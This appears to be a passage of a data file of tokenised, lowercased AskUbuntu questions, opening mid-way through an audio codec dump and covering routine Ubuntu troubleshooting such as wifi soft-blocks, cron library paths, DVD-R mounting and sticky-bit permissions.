96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x17* 0x18 0x23 0x24 node 0x16 [ audio input ] wcaps 0x100d1b : stereo amp-in r/l amp-in caps : ofs=0x4a , nsteps=0x50 , stepsize=0x03 , mute=1 amp-in vals : [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] converter : stream=0 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x17* 0x18 0x23 0x24 node 0x17 [ audio selector ] wcaps 0x30050d : stereo amp-out control : name= '' mic boost volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x00 , nsteps=0x04 , stepsize=0x27 , mute=0 amp-out vals : [ 0x00 0x00 ] power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x1a* 0x1b 0x1d 0x1e node 0x18 [ audio selector ] wcaps 0x30050d : stereo amp-out amp-out caps : ofs=0x00 , nsteps=0x04 , stepsize=0x27 , mute=0 amp-out vals : [ 0x00 0x00 ] power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x1a* 0x1b 0x1d 0x1e node 0x19 [ pin complex ] wcaps 0x400581 : stereo control : name= '' headphone jack '' , index=0 , device=0 pincap 0x0000001c : out hp detect pin default 0x04211040 : [ jack ] hp out at ext right conn = 1/8 , color = black defassociation = 0x4 , sequence = 0x0 pin-ctls : 0xc0 : out hp unsolicited : tag=01 , enabled=1 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1a [ pin complex ] wcaps 0x400481 : stereo control : name= '' mic jack '' , index=0 , device=0 pincap 0x00001324 : in detect vref caps : hiz 50 80 pin default 0x04a11030 : [ jack ] mic at ext right conn = 1/8 , color = black defassociation = 0x3 , sequence = 0x0 pin-ctls : 0x24 : in vref_80 unsolicited : tag=02 , enabled=1 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x1b [ pin complex ] wcaps 0x400581 : stereo pincap 0x00011334 : in out eapd detect vref caps : hiz 50 80 eapd 0x2 : eapd pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : vref_hiz unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1c [ pin complex ] wcaps 0x400581 : stereo pincap 0x00000014 : out detect pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1d [ pin complex ] wcaps 0x400581 : stereo pincap 0x00010034 : in out eapd detect eapd 0x2 : eapd pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1e [ pin complex ] wcaps 0x400481 : stereo pincap 0x00000024 : in detect pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x1f [ pin complex ] wcaps 0x400501 : stereo control : name= '' speaker phantom jack '' , index=0 , device=0 pincap 0x00000010 : out pin default 0x90170110 : [ fixed ] speaker at int n/a conn = analog , color = unknown defassociation = 0x1 , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10 0x11* node 0x20 [ pin complex ] wcaps 0x400781 : stereo digital pincap 0x00000010 : out pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 1 0x12 node 0x21 [ audio output ] wcaps 0x611 : stereo digital converter : stream=0 , channel=0 digital : digital category : 0x0 iec coding type : 0x0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x5 ] : pcm ac3 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x22 [ pin complex ] wcaps 0x400781 : stereo digital pincap 0x00000010 : out pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 1 0x21 node 0x23 [ pin complex ] wcaps 0x40040b : stereo amp-in control : name= '' internal mic boost volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' internal mic phantom jack '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x04 , stepsize=0x2f , mute=0 amp-in vals : [ 0x00 0x00 ] pincap 0x00000020 : in pin default 0x90a60150 : [ fixed ] mic at int n/a conn = digital , color = unknown defassociation = 0x5 , sequence = 0x0 misc = no_presence pin-ctls : 0x20 : in power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x24 [ audio mixer ] wcaps 0x20050b : stereo amp-in amp-in caps : ofs=0x4a , nsteps=0x4a , stepsize=0x03 , mute=1 amp-in vals : [ 0x00 0x00 ] [ 0x00 0x00 ] power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10 0x11 node 0x25 [ vendor defined widget ] wcaps 0xf00000 : mono
432604	could n't connect to accessibility bus	when using ssh with x11 forwarding , i am getting various errors and warnings when running gui applications . as an example , any time i am running gitg , i get the following warning : ** ( gitg:15904 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-ychcoqcrqt : connection refused besides being ugly , does that suggest any real error ? i get the same warning running evince : ** ( evince:16634 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-ychcoqcrqt : connection refused ... or eog : ** ( eog:16872 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-ychcoqcrqt : connection refused and so on . perhaps it worth mentioning : i am connecting from 12.04 to ( yes , unsupported ) 13.04 .
432605	xsp4 address already in use error . ca n't run mono application	i compiled mono 3.0 , xsp and other related libs . my web aplication directory is /var/www/mvctest/public_html i configured apache sites-default file just like in this tutorial i put my mono+nancy application application inside /var/www/mvctest/public_html . when i start xsp4 in this directory , i get the following error xsp4 listening on address : 0.0.0.0 root directory : /var/www/mvctest/public_html address already in use at system.net.sockets.socket.bind ( system.net.endpoint local_end ) [ 0x00000 ] in < filename unknown > :0 at mono.webserver.xspwebsource.createsocket ( ) [ 0x00000 ] in < filename unknown > :0 at mono.webserver.applicationserver.start ( boolean bgthread , int32 backlog ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper remoting-invoke-with-check ) mono.webserver.applicationserver : start ( bool , int ) at mono.webserver.xsp.server.debugmain ( system.string [ ] args , boolean root , iapplicationhost ext_apphost , boolean quiet ) [ 0x00000 ] in < filename unknown > :0 root @ servername : /var/www/mvctest/public_html # what 's wrong with xsp ? what is a right way to deploy a mono application ? how am i supposed to set any other configs ?
432606	can not find file	am new in ubuntu , i have install kde plasma desktop , and want to install kde base plug in , and i have to run a configure.sh script file , and i try to type in : ./home/michael/downloads/document/kdebase/configure.sh it can not find the file but the file is there , how can i run install.sh file same place . can someone help me . thanks .
432610	how to know which processes have the display variable set ?	sometimes i face some problems in display and mostly i do want to know which files or processes are using the display environment variable . so how to list all processes that having display set ?
432618	how can `` git gui '' open repository from parent directory ?	i start git gui tool using command git gui or git citool . i wanted to add another entry to right click script menu ( already have dozens of commands ) and created a script like this : # ! /bin/sh git citool $ 1 or # ! /bin/sh git gui $ 1 but any of these opens a blank git gui this does not happen if i open the terminal and run git gui from it . where am i making a mistake ? dozens of other apps work with the same parameter $ 1 . could it be that extra parameter gui or citool is causing the error ? !
432629	install mozilla thunderbird	i want to install upgraded version of mozila thunderbird from downloaded file from thunderbird website . i want to install this on ubuntu but it contain lot of files . normally i can install any program from .deb package file format . how can i install this ? farooq
432632	my ( and only my ) wifi network keeps disappearing	since a few days ( i guess caused by some recent update ) i have a problem with my wifi connection on ubuntu 12.04 . i see all the wifi networks and can connect successfully . the wifi works perfectly fine for like one day . then all of a sudden ( maybe caused by the update manager ? ) my wifi disappears . it is not listed as available anymore . i also can not connect to it manually ( as a hidden network ) and it does not appear if i run iwlist scan . all other wifi networks are still there and i can connect to them . what works though is change the ssid of my network . i can then connect again under the new ssid . but again after one day or so it disappears and i have to change the ssid again . this is very anoying . not only do n't i know how to solve the problem . i do not even know where to start searching for the cause . i.e . which logfiles should i check ? what can i try to debug ? i will happily provide you with any information about my system . just tell me where to start . thanks for any helpful advice . edit : so this is the output of lshw -class network : description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : eth1 version : 01 serial : 00:16:44 : f0:43 : fd width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : f6cfc000-f6cfffff the dmesg logfile is here : https : //www.dropbox.com/s/3ohtabodt7i00f8/dmesg.txt
432634	script not running in crontab , file not found	i need your help to run a bash script in crontab . as many other posts in askubuntu i 'm facing the problem that a script that is properly running in terminal mode does not run in crontab . the error i get is : /usr/local/rams60/build/fdgrib2/fdgrib2 : error while loading shared libraries : libhdf5.so.8 : can not open shared object file : no such file or directory cron output also shows term environment variable not set . but of course libhdf5.so.8 exists : lrwxrwxrwx 1 root root 16 ene 20 12:54 /usr/local/hdf5/lib/libhdf5.so.8 - > libhdf5.so.8.0.1 i found some posts about similar issues like reasons why crontab does not work http : //stackoverflow.com/questions/5064518/shell-script-and-cron-problems ? rq=1 following that posts i set path in my script adding both /usr/local/rams60/build/fdgrib2/ and /usr/local/hdf5/lib/ for sure i am missing some simple setting but i ca n't see where . thanks in advance for your help
432636	can not seem to get bash history along with others working	this is very similar to all the other questions out there but at the same time not . i am running ubuntu 12.04.4 lts ( gnu/linux 3.2.0-59-generic x86_64 ) to be precise . i successfully setup a new user with : useradd -m webuser , however , no matter what i do i can not seem to get most the bash functions like auto complete and history to work . for example my bashrc file has : # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoredups : ignorespace # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 but when i echo `` $ histfilesize '' i do not get null but i do not get a result either : $ echo `` $ histfilesize '' ( unfortunately this site does n't allow me to actually show you since it tries to be very intelligent ) . this goes for all history variables . no matter what i do i can not seem to get the basic environment variables to work and , as it seems the .bashrc to be read . ontop of this my set -o is pathetically small : current option settings errexit off noglob off ignoreeof off interactive on monitor on noexec off stdin on xtrace off verbose off vi off emacs off noclobber off allexport off notify off nounset off nolog off debug off and all the question i try do n't help , i.e . : http : //superuser.com/questions/174306/how-can-i-enable-the-bash-command-history i am logging in using ssh via putty . edit output of echo $ 0 straight from the ssh temrinal : $ echo $ 0 -sh
432637	issues with wine screen resolution	hardware : very old dell inspiron 6400 laptop , onboard video , no driver support . planning on buying a new computer soon , but wondering if this is a hardware issue which could be solved by buying a new machine , or a software issue which can be solved with the machine i have by me not being a dolt . anyway , i 'm trying to play hearthstone on wine 1.7.14 under ubuntu 13.10 . i 've set my wine to have a virtual desktop , because otherwise starting up hearthstone locks my computer , as if a new process is getting mouse focus , but since that process does n't start properly i just lose the ability to use my mouse ( keyboard works fine though , and the system does n't lag at all , just the mouse dies ) . when i start up hearthstone in my virtual desktop , i get a popup in my virtual desktop telling me something about screen resolution or some such . i 'm not quite sure what the problem is or how to fix it , and was wondering if anyone here could be of assistance . unfortunately i 'm new to this site so i ca n't post an image of the error message , but here 's the text of the message : could n't setup opengl for the requested monitor resolution glcontext : failed to share context 40000 : success screen : could not setup gl for resolution ( 1152x864 fs=1 hz=60 wi ... [ error message gets cut off here ] glcontext : failed to share context 30002 : success screen : could not setup gl for resolution ( 1152x864 fs=0 hz=0 win ... thanks for the help !
432639	msi gs70 ubuntu 13.10 stuck on boot , loading initial ramdisk	new laptop , msi , 4th generation intel chip ubuntu 13.10 installed . i was able to login , work normally . after a couple of days i got a message 'loading initial ramdisk ' on boot screen . reading through the forums , i added to grub cmd : i915.i915_enable_rc6=1 , acpi_osi=linux ( without comma , ca n't remember which order ) and it worked . then after a couple of days , i was not able to login again . so i tried different options from http : //www.phoronix.com/scan.php ? pag ... tel_i915_power and it worked again . two days later , i am again not able to login to ubuntu . previously i had tried to install nvidia drivers ( because i have nvidia geforce card ) . this caused a catastrophe , i had to reinstall ubuntu . does anyone have ideas on how to solve this problem ? also more importantly why is it happening ? why would the options above work , only to fail after a couple of days ? laptop model is msi gs70 . note : i have also tried acpi=0 , acpi_backlight=vendor , i915.modeset=0 , nouveau.modeset=0 , nomodeset , video=1280x1024-24 @ 60 , video=1:1280x1024-24 @ 60 , none of these options worked . any help/comments would be appreciated .
432640	will dwa-131 work after installing drivers with ndiswrapper ?	i have bought a d-link dwa-131 wireless usb adapter . version b1 . i have ubuntu 13.10 . i have the install cd for the adapter . it is a stationary pc i do not understand any of the guides to make this work that i have found so far . i am new to the whole ubuntu experience , since i used to run windows xp . can someone give me a step by step guide to how i can make this work ? i know how to open the terminal in ubuntu , and that is about it . i have an internet connection from my laptop , wireless built in . and is also using ubuntu on that . i do n't know what terms like `` kernel '' or `` root '' means . so real basic please . : d edit : so i ran the lsusb the devise comes up as : bus 001 device 007 : id 2001:330d d-link corp . if the driver is already present , then it should work . sadly i still has no connection to the wireless network . i have looked through the content of the cd that came with the device , but no linux/ubuntu drivers were present . only drivers for windows and mac .
432646	problems loading zimbra desktop client	i can not seem to use zimbra desktop client on ubuntu v13.10 32 bit it appears to install but i can not find the icon to run the app
432647	move forward and backward by one word	in a gnome terminal , the standard ways of moving forward or backward by one word do not work . in spite of what the documentation says : alt+b : goes back one word at a time . alt+f : moves forward one word at a time . if i do the above , i just open the drop-down menu for tabs and edit . how can i fix this ?
432649	swift proxy server not running	we are making a private cloud using openstack manual install guide of essex version . we have reached the swift configuration part . for installing swift we need 5 components , proxy server being the one . the configuration file for swift proxy server is as follows : /etc/swift/proxy-server.conf [ default ] bind_port = 8080 user = swift swift_dir = /etc/swift [ pipeline : main ] # order of execution of modules defined below pipeline = catch_errors healthcheck cache authtoken keystone proxy-server [ app : proxy-server ] use = egg : swift # proxy allow_account_management = true account_autocreate = true set log_name = swift-proxy set log_facility = log_local0 set log_level = info set access_log_name = swift-proxy set access_log_facility = syslog set access_log_level = info set log_headers = true account_autocreate = true [ filter : healthcheck ] use = egg : swift # healthcheck [ filter : catch_errors ] use = egg : swift # catch_errors [ filter : cache ] use = egg : swift # memcache set log_name = cache [ filter : authtoken ] paste.filter_factory = keystone.middleware.auth_token : filter_factory auth_protocol = http auth_host = 127.0.0.1 auth_port = 35357 auth_token = admin service_protocol = http service_host = 127.0.0.1 service_port = 5000 admin_token = admin admin_tenant_name = service admin_user = swift admin_password = swift delay_auth_decision = 0 [ filter : keystone ] paste.filter_factory = keystone.middleware.swift_auth : filter_factory operator_roles = admin , swiftoperator is_admin = true after creating the proxy-server configuration file , we configured account , object , container server and swift rings.then we ran the following command : sudo swift-init main start all the remaining 4 components were running except proxy server.it gave the following error : error : trying to load config /etc/swift/proxy-server.conf : file contains no section headers . file : /etc/swift/proxy-server.conf , line:1 ' [ default ] \n ' please help.. !
432653	samsung qx411 : wifi softlock does n't change !	i have samsung qx411 with ubuntu 12.10 ( also windows 7 ) . when i was trying to restart my modem ( via commandline ) i mistakenly soft-locked my wifi ! here is what i see : daniel @ daniel-pc-linux : /etc/modprobe.d $ rfkill list 0 : i2400m-usb:2-1.3:1.0 : wimax soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no so i guess the problematic part is : soft blocked : yes i tried to : rfkill unblock all but it does n't work . i searched the forums and got similar results , but they are usually specific to brands ( for example this : can not change soft block setting to `` no '' for wireless which is specific to acer ) . any idea how can i fix my wifi ? update : even with admin does n't work : sudo rfkill unblock all
432663	is there a way to restrict the packages installable from a repository ?	i want to restrict the packages installable from a repo , eg restrict some packages to the main ubuntu repos , even if they are available from launchpad or some other third party repos , something like pinning some packages to certain repository . normally the repository last added repo takes over all the packages which were available in other earlier repos .
432666	internet connection only in recovery mode 12.04	my internet connection with 12.04 does n't work when i do a normal startup . i can only get it to work if i go to recovery mode every time , go down the menu to network and enter , then the menu reappears and i can enter normal mode and a few other screens that appear , and then i have the internet connection . what do i have to change to get get the connection in the normal startup from the begining ? i am using an old packard bell platinum desktop . in all previous versions of ubuntu , i never had this problem . from etc/network/interface : the loopback network interface auto lo iface lo inet loopback the primary network interface auto eth0 networkmanager # iface eth0 inet dhcp on startup in recovery mode i get the message : ignoring unrecognized interface eth0=eth0 i also get a message : initctl failed . i have a direct connection to fiber so i guess that is dsl .
432667	what does lsof|gawk ' $ 4~/txt/ { next } ; /reg . *\ ( deleted\ ) $ / { printf `` > /proc/ % s/fd/ % d\n '' , $ 2 , $ 4 } ' command mean	i 'm reading some articles and i 've seen this command : lsof|gawk ' $ 4~/txt/ { next } ; /reg . *\ ( deleted\ ) $ / { printf `` > /proc/ % s/fd/ % d\n '' , $ 2 , $ 4 } ' could some body help me to understand it
432671	is zeitgeist broken in ubuntu 13.10 ?	running ubuntu 13.10 . about a month ago i looked at the size of the zeitgeist files in ~/.local/share/zeitgeist and found the -wal and -shm sqlite files to be over 4gb in total . as this is horrifically large deleted the old databases and updated via activity log manager to only record document , spreadsheet , and presentations . today i looked and the -wal file was over 1gb already . i do n't look at that many spreadsheets , and even if a did , 1gb to log the activity ? i then tried to purge all records using activity log manager ... this ran for about 15 minutes , hitting the hard drive and appeared to do nothing other than increase the size of the -wal file to over 3gb ( ! ) at this point i gave up and killed zeitgeist , deleted the sqlite files , and switched off all logging . the files are now sitting static at about 32k . my questions are : i use cairo-dock instead of unity . are there any downsides to not having zeitgeist logging anything ? ( i 'd prefer not to uninstall as i do n't want to harm unity functionality in case i go back to it ) is this behaviour apparent on pre 13.10 releases ? what 's going on with zeitgeist ? i thought a sqlite database was quite efficient , so i do n't see how pure activity logging in a month can hit 1gb ? is there any limit to how long zeitgeist retains data ? are these files always going to grow and grow ? ( sorry that this is adding to the raft of zeitgeist questions , but i want to know if it 's a new issue )
432675	how to increase cpu usage	for my thesis i want to write fortran program . i have a k53-sm asus laptop with core i7 and 8gig ram . when i run my program my cpu usage is 13 % . how can i increase my cpu usage to 100 % on ubuntu 13.04 and all of 8 cores cpu cores active ?
432679	getting git error on juju charm-upgrade	i 'm playing with the upgrade-charm command to better understand how it works and what happens during it . i 'm using ubuntu 14.04 . according to the log juju tries to use the git client for a charm upgrade . i 'm getting an error from git 'please tell me who you are . ' so questions : - does juju use git for charm-upgrade ? - do i have configure git in install hook to be able to use upgrade-charm ? below is my log : 2014-03-11 11:02:04 error juju git.go:216 worker/uniter/charm : git command failed : exit status 128 path : /var/lib/juju/agents/unit-nats-0/state/deployer/update-20140311-110204199654397 args : [ ] string { `` commit '' , `` -- allow-empty '' , `` -m '' , `` imported charm \ '' local : trusty/cf-nats-12\ '' from \ '' /var/lib/juju/agents/unit-nats-0/state/bun dles/local_3a_trusty_2f_cf-nats-12\ '' . '' } *** please tell me who you are .
432683	hotspot does not allow android to obtain an ip address	i 'm using the instructions from http : //www.webupd8.org/2013/06/how-to-set-up-wireless-hotspot-access.html and i 've tweaked it for infrastructure mode , however my android 4.2.2 device is stuck in an `` obtaining ip address loop ''
432684	nvidia quadro fx 3700 screen randomly turns off [ ubuntu 12.04 ]	i have recently changed my graphics card to quadro fx3700 , before i had nvidia 9800gt . after the upgrade i have experienced random screen blackouts during intensive use like during playing trine 2 or watching online videos . i have tried many driver versions from ubuntu repo and also from xorg edgers but nothing helps . i habve also upgraded to the lates xorg and kernel stack from sausy . also my pc is connected to a phillips tv not a monitor - maybe this is the cause ? before the upgrade this was not an issue.. any thoughts ? cheers
432690	error mounting/format/part bootable usb	error mounting : mount : block device /dev/sde2 is write-protected , mounting read-only mount : wrong fs type , bad option , bad superblock on /dev/sde2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so dmesg |tail output : [ 35386.452383 ] ieee80211 phy0 : rt2800usb_entry_txstatus_timeout : warning - tx status timeout for entry 6 in queue 0 [ 35386.452401 ] ieee80211 phy0 : rt2800usb_entry_txstatus_timeout : warning - tx status timeout for entry 6 in queue 0 [ 35386.452404 ] ieee80211 phy0 : rt2800usb_entry_txstatus_timeout : warning - tx status timeout for entry 6 in queue 0 [ 36189.980082 ] isofs_fill_super : bread failed , dev=sde1 , iso_blknum=16 , block=32 [ 37247.825497 ] hfsplus : invalid secondary volume header [ 37247.825501 ] hfsplus : unable to find hfs+ superblock [ 37542.436324 ] hfsplus : invalid secondary volume header [ 37542.436328 ] hfsplus : unable to find hfs+ superblock [ 38649.462360 ] hfsplus : invalid secondary volume header [ 38649.462365 ] hfsplus : unable to find hfs+ superblock otherwise i usually get read-only errors etc . any way of formatting/erasing this ? i 'm trying to make a bootable disk for mac osx , but somewhere along the way something is corrupted . i 've tried programs and admin settings in mac osx ( terminal and disk util ) and similar things and programs in windows ( partition manager , hp usb etc. ) . i 've also tried the standard f-disk and such . i cant seem to open the graphical user interface for gparted either , even though it is installed . any way of just wiping the whole disk clean ? any -su options or otherwise would be great . thanks ! edit : after 3 days and countless efforts i found the simple solution . i simply used : sudo nautilus exited the nautilus opened disk utility and i have no problems wiping the usb . however , windows still recalls this is a raw , mac osx ca n't boot since file system almost got to fat32 ( but corrupted ) error in diskutility : error : creating partition table : helper exited with exit code 1 : can not open /dev/sdd : read-only file system tried sudo chmod in all variations , still no access ... i feel like im soo close ...
432696	i want to install ubuntu	i want to install ubuntu . for now i am using windows xp . i have 2 partitions , one with the windows files , and one with my personal files . can i keep my partition with the personal files and install ubuntu on the first partition ?
432697	no file-preferences menu	i am using ubuntu 13.10 and nautilus , in order to configurate my image preview , i wanted to access the file menu.. but there are no preferences at all . is it possible to enable / disable them ?
432698	updated from phpunit 3.7.32 to 4.0.6 , broke my unittesting	so i was unit testing some code with phpunit 3.7.32 or so and it was working fine but i tried to upgrade to version 4.0.6 ... big mistake it seems . i really do n't know where to go at this point ; wasted 40 mins+ probably trying this and that via stack overflow answers but i still have n't got it working properly . initially the error i had was something to do with not finding autoload.php which i was requiring but now after a mess of uninstalls , reinstalls , forcing dependency installs through pear ... i now have this error when trying to run my unit test code . php fatal error : can not redeclare class php_codecoverage_filter in /usr/share/php/php/codecoverage/filter.php on line 61 edit : it looks like a namespace/conflict issue perhaps ? i searched in usr/share/php and it seems there is a second filter.php in phpunit/util i would prefer to get phpunit 4.0.6 working for me but if that seems way out of the question through some streak of bad luck then precise downgrading instructions would be appreciated . p.s . perhaps someone should create a phpunit tag ? i notice there is none and being a newbie can not make it .
432699	what is the `` sticky bit '' ( t permission ) and why does /tmp have it ?	the command ls -ld /tmp gives drwxrwxrwt 30 root root 20480 mar 11 14:17 /tmp what is the letter t after the permissions ? as far as i know /tmp is used to create temporary files related to different users in the system , so how come it has permission 777 ? this seems wrong for me . please i need your help to understand what is going here .
432700	problems reading filesystem of recorded dvd-r	i am experiencing problems when trying to read dvd-rs or dvd+rs recorded by different tv dvd recorders . usually the problem is that when i try to manually mount the dvd with the udf option ( with auto option same output ) : giankun @ giankun-imedia-s3810 : ~ $ sudo mount -o ro -t udf /dev/sr0 /media/giankun/dvd mount : tipo fs errato , opzione non valida , superblocco su /dev/sr0 danneggiato , codepage o programma ausiliario mancante , o altro errore in alcuni casi si possono trovare informazioni utili in syslog . provare ad esempio 'dmesg | tail' which says `` fs type wrong , invalid option , superblock on /dev/sr0 damaged , etc . and dmesg | tail [ 2525.446871 ] udf-fs : error ( device sr0 ) : udf_read_tagged : read failed , block=36641552 , location=0 [ 2525.446878 ] udf-fs : warning ( device sr0 ) : udf_fill_super : no fileset found [ 2892.059449 ] nouveau e [ drm ] ddc responded , but no edid for vga-1 [ 4317.181251 ] udf-fs : error ( device sr0 ) : __udf_read_inode : ( ino 2145710 ) failed ! bh [ 4317.282267 ] udf-fs : error ( device sr0 ) : __udf_read_inode : ( ino 2145709 ) failed ! bh [ 4317.383362 ] udf-fs : error ( device sr0 ) : __udf_read_inode : ( ino 2145708 ) failed ! bh [ 4317.484452 ] udf-fs : error ( device sr0 ) : __udf_read_inode : ( ino 2145707 ) failed ! bh [ 4317.484464 ] udf-fs : failed to read vat inode from the last recorded block ( 2145710 ) , retrying with the last block of the device ( 2145711 ) . [ 4317.485948 ] udf-fs : error ( device sr0 ) : udf_read_tagged : read failed , block=36641552 , location=0 [ 4317.485954 ] udf-fs : warning ( device sr0 ) : udf_fill_super : no fileset found and this when i try to mount as iso9660 giankun @ giankun-imedia-s3810 : ~ $ sudo mount -o ro -t iso9660 /dev/sr0 /media/giankun/dvd mount : tipo fs errato , opzione non valida , superblocco su /dev/sr0 danneggiato , codepage o programma ausiliario mancante , o altro errore in alcuni casi si possono trovare informazioni utili in syslog . provare ad esempio 'dmesg | tail' with relative dmesg | tail [ 4395.151558 ] isofs : unable to identify cd-rom format . i think this is not a problem with my hardware because on the same machine w7 ( i have dual boot ) can read the disks and extract the files ( most of those disks must then be decrypted since they are cprm encoded coming from a japanese dvd recorder ) . however the drive is an atapi dvd a dh16absh . i already tried switching to ide mode from ahci ( bios setting ) but nothing worked . i must add any other disk ( including data dvd and original video dvds ) is correctly mounted . is there a way to mount these particular disks ? is this a known bug ( i have found some short references of people having the same problem online , but no solutions like in this discussion ) ? here is what i can exctract from one of those disks by nero , kb , and a windows util i downloaded : nero : disc information ( e : \ ) -- -- -- -- -- -- -- -- -- type : : dvd-r capacity : 487:54.50 ( 828 mb ) tracks : 3 sessions : 1 file system : , udf title : n/a date : n/a publisher : n/a application : n/a kb : medium type : dvd-r sequential media id : mxl rg04 capacity : 487:54:50 min ( 4,2 gib ) used capacity : 487:54:50 min ( 4,2 gib ) remaining : 00:00:00 min ( 0 b ) rewritable : no appendable : no empty : no layers : 1 sessions : 1 supported writing speeds : 6.0x ( 8310 kb/s ) 8.0x ( 11080 kb/s ) 12.0x ( 16620 kb/s ) 16.0x ( 22160 kb/s ) iso9660 filesystem info system id : - volume id : - volume set id : - publisher id : - preparer id : - application id : - volume size : 0 b ( 0 b * 0 blocks = 0 b ) tracks type attributes first-last sector length 1 ( data ) no copy/uninterrupted 0 - 543 544 ( 00:07:19 ) 2 ( data ) no copy/uninterrupted 560 - 831 272 ( 00:03:47 ) 3 ( data ) no copy/uninterrupted 848 - 2195599 2194752 ( 487:43:27 ) dvd info : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- unique disc identifier : [ dvd-r : mxl rg04 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- disc & book type : [ dvd-r ] - [ dvd-r ] manufacturer name : [ hitachi maxell ltd. ] manufacturer id : [ mxl rg04 ] blank disc capacity : [ 2,298,496 sectors = 4.71 gb ( 4.38 gib ) ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ dvd identifier v5.2.0 - http : //dvd.identifier.cdfreaks.com ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ** info : hex dump of 'media code'-block listed below ** info : 4-byte header preceding 'media code'-block discarded ** info : format 0eh - pre-recorded information in lead-in 0000 : 01 40 c1 fd 9e d8 52 00 02 85 0e 0d 99 ab 80 00 . @ ... .r ... ... ... 0010 : 03 4d 58 4c 20 52 47 00 04 30 34 00 00 00 00 00 .mxl rg..04 ... .. 0020 : 05 88 80 00 00 00 02 00 06 09 0b 15 87 78 90 00 ... ... ... ... .x.. 0030 : 07 88 80 00 00 00 00 00 08 08 13 0d 11 0c 08 00 ... ... ... ... ... . 0040 : 09 95 07 0e 0b 78 88 00 0a a0 00 20 00 20 10 00 ... ..x ... .. . .. 0050 : 0b 09 19 17 97 88 85 00 0c b6 89 2b 82 30 23 00 ... ... ... ..+.0 # . 0060 : 0d 00 00 d0 00 00 00 00 00 00 ... ... ... . ** info : hex dump of 'control data zone'-block listed below ** info : 4-byte header preceding 'cdz'-block discarded ** info : format 10h - physical format information of control data zone 0000 : 25 0f 02 00 00 03 00 00 00 26 12 7f 00 00 00 00 % ... ... .. & ... ...
